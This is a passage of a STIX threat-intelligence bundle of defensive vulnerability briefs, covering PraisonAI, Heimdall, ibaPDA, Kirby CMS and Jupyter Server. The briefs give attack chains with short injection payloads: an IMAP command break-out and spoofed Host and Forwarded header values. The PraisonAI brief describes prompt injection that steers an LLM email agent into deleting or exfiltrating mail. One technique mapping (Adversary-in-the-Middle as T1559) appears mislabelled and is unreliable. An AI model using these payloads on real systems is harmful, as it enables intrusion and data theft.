      "description": "## Overview\n\nA critical command injection vulnerability has been identified in the `praisonaiagents` package, affecting versions up to and including 1.6.48, developed by PraisonAI. This flaw stems from the improper sanitization of LLM-controlled parameters (such as `from_addr`, `subject`, `query`, `search_id`, and `message_id`) when constructing IMAP SEARCH commands. Attackers can leverage this by crafting malicious prompts that, when processed by an LLM agent configured with email tools, cause the agent to execute arbitrary IMAP commands on the backend mail server. This vulnerability, actively reported in June 2026, poses a significant risk to organizations using PraisonAI agents with email integration, potentially leading to sensitive data exfiltration, permanent email deletion, or denial-of-service by terminating IMAP sessions.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious prompt containing an IMAP command injection payload, such as a double-quote followed by an IMAP command (e.g., `\" LOGOUT`).\n2.  An LLM agent, configured with `EMAIL_ADDRESS` and `EMAIL_PASSWORD` environment variables, processes the crafted prompt as part of its normal operation.\n3.  The LLM agent calls an internal `praisonaiagents` tool function (e.g., `search_emails`, `reply_email`, or `archive_email`) passing the malicious input as a parameter (e.g., `from_addr`, `subject`, `query`, `search_id`).\n4.  The `praisonaiagents` tool function dynamically constructs an IMAP `SEARCH` command by directly interpolating the unsanitized parameter into an f-string, allowing the attacker's double-quote to prematurely close the legitimate quoted string.\n5.  The constructed IMAP command string, now containing an injected IMAP command (e.g., `LOGOUT`, `SELECT INBOX`, `FETCH 1:* (BODY[])`, `DELETE 1:*`, `EXPUNGE`), is sent by the `praisonaiagents` process to the configured IMAP server.\n6.  The IMAP server receives the crafted command string, parses it, and executes both the legitimate `SEARCH` portion (if any) and the injected IMAP command.\n7.  The injected IMAP command performs an unauthorized action on the IMAP server, such as terminating the IMAP session, switching to another mailbox, fetching email contents, modifying email flags, or deleting messages.\n8.  The attacker achieves their objective, which could include exfiltrating sensitive email data, causing denial-of-service, or permanently deleting emails from the compromised mailbox.\n\n## Impact\n\nSuccessful exploitation of this vulnerability grants attackers significant control over the configured IMAP mailbox. Attackers can terminate IMAP connections, causing a denial-of-service against the agent's email capabilities. More critically, arbitrary IMAP commands can be injected, allowing the attacker to enumerate mailboxes (LIST), switch to different folders (SELECT), fetch the contents of any email (FETCH), modify email flags (STORE), move emails (COPY/MOVE), or permanently delete emails (DELETE/EXPUNGE). This leads to unauthorized email data exfiltration from potentially all accessible mailboxes, or catastrophic data loss through permanent deletion of email archives. The attack specifically targets email-capable agents deployed with the documented `EMAIL_ADDRESS` and `EMAIL_PASSWORD` environment variables, indicating a direct threat to sensitive communications.\n\n## Recommendation\n\n*   Immediately update the `praisonaiagents` package to a version greater than 1.6.48 (when available) or apply the recommended remediation of properly escaping double-quote characters or using IMAP literal syntax for all user-controlled parameters (`from_addr`, `subject`, `query`, `search_id`, `message_id`).\n*   Monitor IMAP server logs for suspicious commands, specifically looking for unexpected IMAP keywords (e.g., `LOGOUT`, `SELECT`, `FETCH`, `DELETE`, `EXPUNGE`) embedded within `SEARCH` criteria, as outlined in the Sigma rules above.\n*   Ensure IMAP server logging is enabled and captures full commands and arguments, which is essential to activate the Sigma rules in this brief.\n*   Restrict the permissions of the IMAP account used by `praisonaiagents` to the bare minimum necessary for its operations (e.g., read-only access to specific folders).\n",
      "published": "2026-06-18T15:08:53Z",
      "labels": [
        "command-injection",
        "llm-agent",
        "imap",
        "email",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c2c1be-ce3f-5edf-b12c-7326679223a6",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
        "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-c969-5x3p-vq3v"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6e5a291a-f59f-5286-ba36-defba1f1ebf4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--67c49417-fd51-547d-9fb9-5874066c6de7",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--67c49417-fd51-547d-9fb9-5874066c6de7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Heimdall Proxy Forwarded Header Injection via Unsanitized Host Header",
      "description": "## Overview\n\nA vulnerability (GHSA-4jgr-pg2m-m988) has been identified in Heimdall, an API gateway and access control solution, specifically affecting versions 0.17.16 and earlier when running in proxy mode. This flaw allows attackers to perform `Forwarded` header injection by sending a specially crafted HTTP request where the `Host` header contains unsanitized commas or semicolons followed by `for=` or `proto=`. Heimdall's `proxy/request_context.go` (line 201) directly concatenates the incoming `Host` header value into the `Forwarded` header without proper sanitization, enabling an attacker to inject arbitrary `for=` or `proto=` parameters. This misconfiguration can lead to IP address spoofing, tricking upstream services into believing requests originate from trusted or internal IP addresses (e.g., `127.0.0.1`), thereby facilitating access control bypasses for applications configured behind the Heimdall proxy.\n\n## Attack Chain\n\n1.  An attacker crafts an HTTP GET or POST request targeting a resource behind the vulnerable Heimdall proxy.\n2.  The attacker includes a malicious `Host` header in the request, such as `Host: evil.com,for=127.0.0.1` or `Host: legit.com;for=10.0.0.1;proto=https`.\n3.  The crafted request is sent to the internet-facing Heimdall proxy instance.\n4.  Heimdall receives the request and, operating in proxy mode, prepares to forward it to the configured upstream service.\n5.  During request forwarding, Heimdall's Go application code concatenates the raw value of the incoming `Host` header into the new `Forwarded` header without sanitizing commas or semicolons.\n6.  Heimdall sends the modified request, now containing an injected `Forwarded` header like `Forwarded: for=1.2.3.4;host=evil.com, for=127.0.0.1;proto=http`, to the upstream application.\n7.  The upstream application, configured to trust the `Forwarded` header (especially the last `for=` entry), parses the injected values.\n8.  The upstream service misinterprets the spoofed `for=` value as the legitimate client IP, potentially bypassing IP-based access controls (e.g., allowing access to an `/admin-panel`) or logging an incorrect source IP.\n\n## Impact\n\nThe primary impact of this vulnerability is the ability for attackers to spoof client IP addresses as seen by upstream services. This can directly lead to unauthorized access to sensitive resources, such as administrator panels or internal APIs, if these services rely on IP-based access controls and trust the `Forwarded` header provided by Heimdall. Organizations using Heimdall in proxy mode with upstream applications that parse and trust the `Forwarded` header, especially those that implement IP allowlisting, are at risk. The vulnerability affects all deployments of Heimdall where these conditions are met, potentially leading to data exfiltration, privilege escalation, or full system compromise of the backend services.\n\n## Recommendation\n\n*   Immediately patch Heimdall installations to a version greater than 0.17.16 to address GHSA-4jgr-pg2m-m988.\n*   Deploy the Sigma rules in this brief to your SIEM/detection platform to identify active exploitation attempts against your Heimdall proxy.\n*   Review webserver logs for the `cs-host` field to detect patterns indicative of attempted exploitation, as identified in the \"Detect Heimdall Host Header Injection Attempt\" Sigma rule.\n",
      "published": "2026-06-18T15:11:26Z",
      "labels": [
        "header-injection",
        "proxy",
        "access-control-bypass",
        "ip-spoofing",
        "vulnerability",
        "web"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-4jgr-pg2m-m988"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--20b8979b-3a50-5455-b569-62239cdc1149",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--054c1f50-d61d-5689-9fde-72cb693c32f1",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8ec89191-31d8-5914-acfa-5c1f7651eed8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--054c1f50-d61d-5689-9fde-72cb693c32f1",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--054c1f50-d61d-5689-9fde-72cb693c32f1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Heimdall IP Spoofing via Unvalidated Forwarding Headers",
      "description": "## Overview\n\nA high-severity vulnerability has been identified in `dadrus/heimdall` versions up to and including 0.17.16. This flaw allows attackers to spoof client IP addresses when the `trusted_proxies` option is configured, due to insufficient validation of values extracted from `Forwarded` and `X-Forwarded-For` HTTP headers. Heimdall extracts these header values into `Request.ClientIPAddresses` without checking for syntactically valid IP addresses, accepting arbitrary strings, malformed literals, or RFC 7239 `unknown` values. Additionally, the `Forwarded` header parser fails to correctly handle quoted strings containing delimiters (`,` or `;`), leading to misparsing and the creation of malformed entries. This vulnerability can be exploited by manipulating HTTP forwarding headers, allowing attackers to bypass access control rules that rely on `Request.ClientIPAddresses` for authorization, or to propagate attacker-controlled IP values to upstream services when Heimdall operates in proxy mode.\n\n## Attack Chain\n\n1.  An attacker crafts an HTTP request targeting a heimdall instance where the `trusted_proxies` configuration option is enabled.\n2.  The attacker includes a manipulated `X-Forwarded-For` header (e.g., `X-Forwarded-For: 192.168.1.1, EVIL_IP`) or `Forwarded` header (e.g., `Forwarded: for=\"127.0.0.1;attacker_id\"`, `Forwarded: for=\"unknown\"`) containing a syntactically invalid, spoofed, or otherwise malformed IP address value.\n3.  Heimdall, lacking proper validation, extracts this malicious value from the forwarding header and populates its internal `Request.ClientIPAddresses` property with the attacker-controlled string.\n4.  If the heimdall instance uses rules (e.g., a CEL authorizer) that reference `Request.ClientIPAddresses` to enforce access control (e.g., restricting access to specific IP ranges), these rules evaluate against the spoofed IP.\n5.  The attacker successfully bypasses the intended access control logic, gaining unauthorized access or circumventing restrictions based on the spoofed IP address.\n6.  (Alternative/Concurrent): If heimdall is operating in proxy mode, it uses the manipulated `Request.ClientIPAddresses` to reconstruct `X-Forwarded-For` and `Forwarded` headers before forwarding the request to upstream services.\n7.  Upstream services that trust these forwarded headers will receive and process the attacker-controlled IP value, potentially leading to incorrect logging, misattribution, or further exploitation within the internal network.\n\n## Impact\n\nThe primary impact of this vulnerability is the circumvention of application-level access controls and the potential for misattribution or further exploitation of upstream systems. Organizations utilizing `dadrus/heimdall` as an API gateway or proxy with the `trusted_proxies` option enabled are at risk. Attackers can bypass IP-based authorization checks, granting them unauthorized access to protected resources. Furthermore, in proxy mode, attacker-controlled IP values can be propagated to backend services, corrupting security logs, impacting forensic investigations, or enabling further attacks that rely on source IP validation. There is no information regarding specific victim counts or targeted sectors in the advisory, but any organization relying on Heimdall's IP-based security features could be affected.\n\n## Recommendation\n\n*   Upgrade `dadrus/heimdall` to a version higher than 0.17.16 immediately to patch the vulnerability described in the GHSA advisory.\n*   Ensure network-level controls are in place to only permit trusted proxies to communicate directly with your Heimdall instances.\n*   Configure any proxies forwarding requests to Heimdall to sanitize or completely override, rather than append to, existing `Forwarded` or `X-Forwarded-For` headers.\n*   Review and adjust any rules (e.g., CEL authorizer rules) that rely on `Request.ClientIPAddresses` for security-sensitive decisions, considering the potential for IP spoofing until patches are applied.\n*   Deploy the Sigma rules provided in this brief to your SIEM to detect attempts at IP spoofing via manipulated `X-Forwarded-For` and `Forwarded` headers.\n",
      "published": "2026-06-18T15:12:55Z",
      "labels": [
        "ip-spoofing",
        "access-bypass",
        "web-application",
        "github-advisory"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-38x9-25wx-7fg2"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--61104fb0-a393-502b-ab00-94171d9aa653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3a652e75-cf4c-5d80-b672-7ac960c10536",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6a78005c-4440-5bcc-b86b-70c1c9541ed0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3a652e75-cf4c-5d80-b672-7ac960c10536",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3a652e75-cf4c-5d80-b672-7ac960c10536",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of CVE-2026-8024 in ibaPDA and ibaDatCoordinator via Deserialization of Untrusted Data",
      "description": "## Overview\n\nA critical deserialization of untrusted data vulnerability, tracked as CVE-2026-8024, has been identified in ibaPDA (versions less than 8.14.0) and ibaDatCoordinator (versions less than 4.0.7) products. This flaw allows a remote, unauthenticated attacker to exploit the affected systems by sending specially crafted input. Successful exploitation grants the attacker full access, enabling arbitrary code execution within the context of the vulnerable application. Given the nature of these products often used in industrial control systems (ICS) environments, this vulnerability poses a significant risk for operational disruption, data integrity compromise, and potentially broader network intrusion. Organizations utilizing these iba products should prioritize patching immediately to prevent critical impact.\n\n## Attack Chain\n\n1.  A remote, unauthenticated attacker identifies an exposed instance of ibaPDA (version \u003c 8.14.0) or ibaDatCoordinator (version \u003c 4.0.7) accessible over the network.\n2.  The attacker crafts a malicious serialized data payload designed to inject and execute arbitrary code.\n3.  The crafted payload is sent to the vulnerable iba application through its network interface, targeting a deserialization function.\n4.  The vulnerable application receives and processes the untrusted input, attempting to deserialize the malicious data.\n5.  During the deserialization process, the embedded arbitrary code is executed with the privileges of the running ibaPDA or ibaDatCoordinator service.\n6.  The executed code can be used to establish persistence on the system, elevate privileges, or initiate further compromise such as C2 communication or data exfiltration.\n7.  The attacker gains full control over the compromised system, potentially leading to operational disruption, data manipulation, or lateral movement within the network.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-8024 grants attackers full control over systems running vulnerable versions of ibaPDA or ibaDatCoordinator. This can lead to severe consequences including arbitrary code execution, enabling attackers to install malware, exfiltrate sensitive process data, disrupt industrial operations, or use the compromised system as a pivot point for further network penetration. Given these applications are often critical to industrial processes, the impact could extend to production downtime, safety incidents, or significant financial losses for affected organizations.\n\n## Recommendation\n\n*   Immediately patch CVE-2026-8024 by updating ibaPDA to version 8.14.0 or higher, and ibaDatCoordinator to version 4.0.7 or higher, as detailed in the CERT VDE advisory (https://certvde.com/en/advisories/VDE-2026-051).\n*   Deploy the provided Sigma rules to your SIEM to detect post-exploitation activity originating from `ibaPDA.exe` or `ibaDatCoordinator.exe`.\n*   Enable Sysmon process-creation and network-connection logging on systems running ibaPDA and ibaDatCoordinator to activate the rules above.\n*   Implement strict network segmentation to limit direct exposure of iba systems to the internet and untrusted networks.\n",
      "published": "2026-06-18T15:14:01Z",
      "labels": [
        "deserialization",
        "rce",
        "ics",
        "scada",
        "vulnerability",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8024"
        },
        {
          "source_name": "reference",
          "url": "https://certvde.com/en/advisories/VDE-2026-051"
        },
        {
          "source_name": "reference",
          "url": "https://iba.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2026-051.json"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--44e4add3-7fb0-5cd3-8f4a-8c1d34070ada",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8660c0c6-60d2-5b45-bd49-5ecce0deeb44",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1136",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1136",
          "url": "https://attack.mitre.org/techniques/T1136"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c1ac48d3-bc54-55e7-8f5e-42b3510f2334",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8660c0c6-60d2-5b45-bd49-5ecce0deeb44",
      "target_ref": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8660c0c6-60d2-5b45-bd49-5ecce0deeb44",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical Kirby CMS Vulnerability Allows Remote Admin Account Creation via Reverse Proxy Headers (CVE-2026-54003)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-54003, affects Kirby CMS versions up to 4.9.3 and from 5.0.0-alpha.1 to 5.4.3. This flaw, dubbed \"External Initialization,\" enables unauthenticated remote attackers to create the initial administrative user account, effectively installing the Kirby Panel with full control over the CMS. The vulnerability arises in specific configurations where Kirby sites, without any configured user accounts, operate behind a reverse proxy that uses the `Forwarded: for=...`, `X-Client-IP`, or `X-Real-IP` HTTP headers. Kirby's `isLocal` check, designed to prevent remote installation, failed to properly account for these headers, leading it to incorrectly assume a remote connection was local. This misidentification grants an attacker the ability to bypass security controls and seize control of the Kirby instance.\n\n## Attack Chain\n\n1.  **Reconnaissance**: Attacker identifies a publicly accessible Kirby CMS instance lacking any configured user accounts, typically indicated by a redirect to the installation wizard upon accessing the Panel URL (`/panel`).\n2.  **Reverse Proxy Identification**: Attacker determines that the target Kirby instance is fronted by a reverse proxy that uses `Forwarded: for=...`, `X-Client-IP`, or `X-Real-IP` headers for client IP forwarding.\n3.  **Craft Malicious Request**: Attacker crafts an HTTP POST request to the Kirby Panel installation endpoint (e.g., `/api/system/install` or similar, depending on Kirby version and setup), including a forged `Forwarded`, `X-Client-IP`, or `X-Real-IP` header set to a local IP address (e.g., `127.0.0.1`).\n4.  **Bypass `isLocal` Check**: The crafted request containing the local IP in the vulnerable header is forwarded by the reverse proxy to the Kirby backend. Kirby's `isLocal` check misinterprets the request as originating from a local source due to the forged header.\n5.  **Initial Admin Account Creation**: The Kirby application proceeds with the installation process, allowing the attacker to provide desired credentials (username, password, email) for a new administrator account via the HTTP POST body.\n6.  **Administrator Access**: Upon successful submission, the attacker-defined administrator account is created, granting full administrative control over the Kirby CMS instance.\n7.  **Post-Exploitation**: The attacker can now perform any actions available to an administrator, including content modification, data exfiltration, plugin installation, or further system compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-54003 grants unauthenticated attackers full administrative control over the affected Kirby CMS instance. This directly leads to complete compromise of the website, allowing for arbitrary content modification, defacement, data theft (including user information if stored), and potentially the injection of malicious code or backdoors into the web application. Given Kirby's use in various industries for content management, the potential victim scope includes any organization or individual utilizing unpatched Kirby versions behind specific reverse proxy configurations with no existing admin users. The vulnerability's criticality stems from the ease of exploitation and the immediate elevation to administrative privileges.\n\n## Recommendation\n\n*   **Patch CVE-2026-54003 immediately**: Update Kirby CMS to version `4.9.4`, `5.4.4`, or a later patched version as detailed in the advisory.\n*   **Deploy the provided Sigma rules**: Implement the `Detects CVE-2026-54003 Exploitation - Kirby Remote Panel Init` rules to your SIEM to identify attempts to exploit this vulnerability.\n*   **Configure Workarounds**: If immediate patching is not feasible, perform the Panel installation yourself by creating an initial admin account. This disables the vulnerable installation code.\n*   **Disable Panel API**: As an alternative workaround, if the Panel is not needed, disable the REST API with the `'api' =\u003e false` option in `config.php` to prevent access to the installation endpoint.\n*   **Review Reverse Proxy Configuration**: Ensure your reverse proxy is configured to properly handle `X-Forwarded-For` or `Client-IP` headers if possible, or verify that `Forwarded: for=...`, `X-Client-IP`, and `X-Real-IP` are not inadvertently exposing internal IP addresses or being spoofed.\n",
      "published": "2026-06-18T15:18:49Z",
      "labels": [
        "web-vulnerability",
        "cms",
        "initial-access",
        "privilege-escalation",
        "kirby"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-whxw-24jc-cwmv"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1d516a7e-7f5d-54b1-9d88-09d9ca4420dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--92b08900-41ce-5223-b431-b99bac546f63",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--94918ef1-3fb1-5427-970b-d43f61492721",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--92b08900-41ce-5223-b431-b99bac546f63",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--8fa27bd5-d2f2-5f4f-9ce9-673b83944e1c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Adversary-in-the-Middle",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1559",
          "url": "https://attack.mitre.org/techniques/T1559"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5bddba04-ae47-5482-af89-f83d39c3d454",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--92b08900-41ce-5223-b431-b99bac546f63",
      "target_ref": "attack-pattern--8fa27bd5-d2f2-5f4f-9ce9-673b83944e1c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--823f2676-c465-5f2e-b50f-30f48fdd8325",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--92b08900-41ce-5223-b431-b99bac546f63",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--92b08900-41ce-5223-b431-b99bac546f63",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Jupyter Server Stored XSS via Missing CSP Sandbox (CVE-2026-44727)",
      "description": "## Overview\n\nJupyter Server, versions up to 2.19.0, is affected by a critical stored Cross-Site Scripting (XSS) vulnerability, identified as CVE-2026-44727. This flaw resides in the `NbconvertFileHandler` and `NbconvertPostHandler` components, specifically due to a missing `sandbox` directive in their Content-Security-Policy (CSP). This oversight allows user-authored Jupyter notebooks containing malicious HTML payloads within `display_data` output to be rendered without proper sanitization or isolation. An authenticated attacker can craft such a notebook and share it. When an unsuspecting, authenticated victim navigates to the malicious notebook's output via the `/nbconvert/html/\u003cpath\u003e` endpoint, the embedded script executes within their browser under the Jupyter origin. This grants the attacker potential access to the victim's authentication tokens, leading to cookie exfiltration, and can be escalated to full `/api/*` authority and kernel Remote Code Execution (RCE) on the server. This vulnerability poses a significant risk to the integrity and confidentiality of data on affected Jupyter environments.\n\n## Attack Chain\n\n1.  **Attacker Crafts Malicious Jupyter Notebook**: An authenticated attacker creates a Jupyter notebook containing a specially crafted HTML payload within a `display_data` output cell, embedding malicious JavaScript.\n2.  **Attacker Uploads/Shares Notebook**: The attacker uploads this malicious notebook to a vulnerable `jupyter_server` instance (versions up to 2.19.0) or shares it with potential victims.\n3.  **Victim Accesses Server**: An authenticated victim logs into the `jupyter_server` instance.\n4.  **Triggering XSS**: The victim navigates their browser to the malicious notebook's output view, which is rendered via the `/nbconvert/html/\u003cpath\u003e` endpoint handled by `NbconvertFileHandler` or `NbconvertPostHandler`.\n5.  **Vulnerable Rendering**: The `jupyter_server` renders the user-authored HTML content. Due to the missing `sandbox` directive in the Content-Security-Policy, the malicious HTML is not isolated and executes without restrictions.\n6.  **Client-Side Execution**: The embedded malicious JavaScript executes within the victim's browser, operating under the same origin as the `jupyter_server`.\n7.  **Token Exfiltration**: The executing script accesses the victim's authentication tokens (e.g., cookies, session tokens) and exfiltrates them to an attacker-controlled domain.\n8.  **Kernel RCE**: Leveraging the victim's authenticated session, the script utilizes full `/api/*` authority to interact with Jupyter's internal APIs, potentially achieving Remote Code Execution on the Jupyter kernel or the underlying server.\n\n## Impact\n\nThe successful exploitation of CVE-2026-44727 can lead to severe consequences for affected `jupyter_server` instances. An authenticated victim's session tokens, including cookies, can be exfiltrated to an attacker-controlled domain, compromising user accounts and sensitive data. Furthermore, the malicious script executing with full `/api/*` authority can be used to interact with the Jupyter environment, potentially achieving kernel Remote Code Execution (RCE). This allows an attacker to execute arbitrary commands on the server hosting the Jupyter kernel, leading to data theft, system compromise, or further network penetration. The vulnerability impacts any organization or individual using `jupyter_server` for data analysis, development, or educational purposes, especially in collaborative environments where users might share notebooks.\n\n## Recommendation\n\n*   Immediately patch `jupyter_server` to version v2.20.0 or higher to address CVE-2026-44727.\n*   For deployments where patching is impractical, implement the provided workaround by adding the Content-Security-Policy modification to your `jupyter_server_config.py` file.\n*   Deploy the Sigma rules \"Detects CVE-2026-44727 Exploitation — Jupyter `nbconvert` HTML 